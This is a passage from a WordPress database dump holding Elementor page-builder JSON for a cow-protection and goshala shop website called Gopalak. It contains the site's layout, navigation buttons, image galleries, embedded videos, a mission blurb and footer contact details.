Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11860,1967,'_elementor_page_assets','a:0:{}'),(11862,1968,'_elementor_edit_mode','builder'),(11863,1968,'_elementor_template_type','wp-page'),(11864,1968,'_elementor_version','3.7.8'),(11865,1968,'_wp_page_template','elementor_canvas'),(11866,1968,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor 